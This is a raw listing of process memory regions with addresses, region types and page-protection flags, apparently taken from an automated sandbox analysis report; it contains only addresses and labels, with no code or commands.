24B307F000
|
stack
|
page read and write
|
||
|
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
|
156EB234000
|
heap
|
page read and write
|
||
|
927000
|
heap
|
page read and write
|
||
|
2AC14FE000
|
stack
|
page read and write
|
||
|
23CC3E2A000
|
heap
|
page read and write
|
||
|
966000
|
heap
|
page read and write
|
||
|
156EAF80000
|
heap
|
page read and write
|
||
|
4D3E000
|
stack
|
page read and write
|
||
|
2876000
|
trusted library allocation
|
page read and write
|
||
|
156D11F0000
|
heap
|
page read and write
|
||
|
25C2000
|
trusted library allocation
|
page read and write
|
||
|
2AC183E000
|
stack
|
page read and write
|
||
|
1D7C9322000
|
heap
|
page read and write
|
||
|
7FF848CBB000
|
trusted library allocation
|
page read and write
|
||
|
25B2000
|
trusted library allocation
|
page read and write
|
||
|
7FF849000000
|
trusted library allocation
|
page read and write
|
||
|
287B000
|
trusted library allocation
|
page read and write
|
||
|
156D4867000
|
trusted library allocation
|
page read and write
|
||
|
156D2D42000
|
trusted library allocation
|
page read and write
|
||
|
67FE000
|
stack
|
page read and write
|
||
|
7FF848CC3000
|
trusted library allocation
|
page execute and read and write
|
||
|
23CC43F3000
|
heap
|
page read and write
|
||
|
1D7B0D70000
|
heap
|
page execute and read and write
|
||
|
24B3437000
|
stack
|
page read and write
|
||
|
2AC147E000
|
stack
|
page read and write
|
||
|
7FF848EE0000
|
trusted library allocation
|
page read and write
|
||
|
23CC43D0000
|
heap
|
page read and write
|
||
|
538E000
|
stack
|
page read and write
|
||
|
7FF848FC0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FE0000
|
trusted library allocation
|
page read and write
|
||
|
156D3FF7000
|
trusted library allocation
|
page read and write
|
||
|
573E000
|
stack
|
page read and write
|
||
|
156D4639000
|
trusted library allocation
|
page read and write
|
||
|
24B420D000
|
stack
|
page read and write
|
||
|
2AC11FE000
|
stack
|
page read and write
|
||
|
2600000
|
heap
|
page execute and read and write
|
||
|
7FF848D56000
|
trusted library allocation
|
page read and write
|
||
|
156EB028000
|
heap
|
page read and write
|
||
|
9CF000
|
heap
|
page read and write
|
||
|
7FF848CB0000
|
trusted library allocation
|
page read and write
|
||
|
156D1028000
|
heap
|
page read and write
|
||
|
960000
|
heap
|
page read and write
|
||
|
400000
|
remote allocation
|
page execute and read and write
|
||
|
23CC3E49000
|
heap
|
page read and write
|
||
|
156D2F81000
|
trusted library allocation
|
page read and write
|
||
|
2AC1ABE000
|
stack
|
page read and write
|
||
|
23CC24CB000
|
heap
|
page read and write
|
||
|
1D7B13A8000
|
trusted library allocation
|
page read and write
|
||
|
23CC43D6000
|
heap
|
page read and write
|
||
|
D3F02FB000
|
stack
|
page read and write
|
||
|
2590000
|
trusted library allocation
|
page read and write
|
||
|
56C6000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848D70000
|
trusted library allocation
|
page read and write
|
||
|
910000
|
heap
|
page read and write
|
||
|
7FF848F20000
|
trusted library allocation
|
page read and write
|
||
|
1D7C9373000
|
heap
|
page read and write
|
||
|
7FF848F00000
|
trusted library allocation
|
page read and write
|
||
|
D3EFAFE000
|
stack
|
page read and write
|
||
|
7FF849024000
|
trusted library allocation
|
page read and write
|
||
|
156D4C37000
|
trusted library allocation
|
page read and write
|
||
|
156EB23E000
|
heap
|
page read and write
|
||
|
5A0E000
|
stack
|
page read and write
|
||
|
550B000
|
heap
|
page read and write
|
||
|
285D000
|
trusted library allocation
|
page read and write
|
||
|
24B2DEF000
|
stack
|
page read and write
|
||
|
7FF848EF0000
|
trusted library allocation
|
page read and write
|
||
|
156D1220000
|
heap
|
page read and write
|
||
|
25BA000
|
trusted library allocation
|
page execute and read and write
|
||
|
23CC2675000
|
heap
|
page read and write
|
||
|
23CC3E74000
|
heap
|
page read and write
|
||
|
1D7C93FA000
|
heap
|
page read and write
|
||
|
2871000
|
trusted library allocation
|
page read and write
|
||
|
23CC3E39000
|
heap
|
page read and write
|
||
|
2580000
|
trusted library allocation
|
page read and write
|
||
|
2594000
|
trusted library allocation
|
page read and write
|
||
|
156D0F69000
|
heap
|
page read and write
|
||
|
7FF848E90000
|
trusted library allocation
|
page execute and read and write
|
||
|
23CC3E21000
|
heap
|
page read and write
|
||
|
5A4E000
|
stack
|
page read and write
|
||
|
66FE000
|
stack
|
page read and write
|
||
|
7FF849028000
|
trusted library allocation
|
page read and write
|
||
|
23CC24FA000
|
heap
|
page read and write
|
||
|
7FF848F40000
|
trusted library allocation
|
page read and write
|
||
|
23CC2448000
|
heap
|
page read and write
|
||
|
156D0F9F000
|
heap
|
page read and write
|
||
|
23CC2485000
|
heap
|
page read and write
|
||
|
1D7B0D10000
|
trusted library allocation
|
page read and write
|
||
|
156E3269000
|
trusted library allocation
|
page read and write
|
||
|
1D7B0DF6000
|
heap
|
page read and write
|
||
|
26F0000
|
trusted library allocation
|
page read and write
|
||
|
156EB013000
|
heap
|
page read and write
|
||
|
1D7C956C000
|
heap
|
page read and write
|
||
|
23CC3E72000
|
heap
|
page read and write
|
||
|
7FF848FD0000
|
trusted library allocation
|
page read and write
|
||
|
484C000
|
stack
|
page read and write
|
||
|
1D7AF440000
|
heap
|
page read and write
|
||
|
156E2F90000
|
trusted library allocation
|
page read and write
|
||
|
156EB227000
|
heap
|
page read and write
|
||
|
4DD3000
|
heap
|
page read and write
|
||
|
1D7C932F000
|
heap
|
page read and write
|
||
|
1D7AF368000
|
heap
|
page read and write
|
||
|
156D339D000
|
trusted library allocation
|
page read and write
|
||
|
657E000
|
stack
|
page read and write
|
||
|
40E000
|
remote allocation
|
page execute and read and write
|
||
|
156D3375000
|
trusted library allocation
|
page read and write
|
||
|
2AC1C3B000
|
stack
|
page read and write
|
||
|
5900000
|
heap
|
page read and write
|
||
|
23CC3E72000
|
heap
|
page read and write
|
||
|
1D7C1321000
|
trusted library allocation
|
page read and write
|
||
|
3811000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D50000
|
trusted library allocation
|
page read and write
|
||
|
1D7C9375000
|
heap
|
page read and write
|
||
|
56B4000
|
trusted library allocation
|
page read and write
|
||
|
2AC18B6000
|
stack
|
page read and write
|
||
|
23CC3E72000
|
heap
|
page read and write
|
||
|
1D7C9328000
|
heap
|
page read and write
|
||
|
5D4E000
|
stack
|
page read and write
|
||
|
5CCD000
|
stack
|
page read and write
|
||
|
920000
|
heap
|
page read and write
|
||
|
7FF848CA0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FE0000
|
trusted library allocation
|
page read and write
|
||
|
23CC3E5F000
|
heap
|
page read and write
|
||
|
1D7B133B000
|
trusted library allocation
|
page read and write
|
||
|
156D48ED000
|
trusted library allocation
|
page read and write
|
||
|
4DF5000
|
heap
|
page read and write
|
||
|
7FF848CC4000
|
trusted library allocation
|
page read and write
|
||
|
156D3379000
|
trusted library allocation
|
page read and write
|
||
|
5910000
|
trusted library allocation
|
page read and write
|
||
|
156D11B0000
|
trusted library allocation
|
page read and write
|
||
|
25B6000
|
trusted library allocation
|
page execute and read and write
|
||
|
2AC157E000
|
stack
|
page read and write
|
||
|
24B34B8000
|
stack
|
page read and write
|
||
|
5D0E000
|
stack
|
page read and write
|
||
|
7FF848F70000
|
trusted library allocation
|
page read and write
|
||
|
1D7C138E000
|
trusted library allocation
|
page read and write
|
||
|
259D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848E60000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D7B1918000
|
trusted library allocation
|
page read and write
|
||
|
23CC3E72000
|
heap
|
page read and write
|
||
|
264E000
|
stack
|
page read and write
|
||
|
156D3366000
|
trusted library allocation
|
page read and write
|
||
|
24B418E000
|
stack
|
page read and write
|
||
|
548E000
|
stack
|
page read and write
|
||
|
156E2FEE000
|
trusted library allocation
|
page read and write
|
||
|
156D4C33000
|
trusted library allocation
|
page read and write
|
||
|
2883000
|
trusted library allocation
|
page read and write
|
||
|
1D7AF470000
|
heap
|
page read and write
|
||
|
1D7AF230000
|
heap
|
page read and write
|
||
|
1D7AF36E000
|
heap
|
page read and write
|
There are 499 hidden memdumps, click here to show them.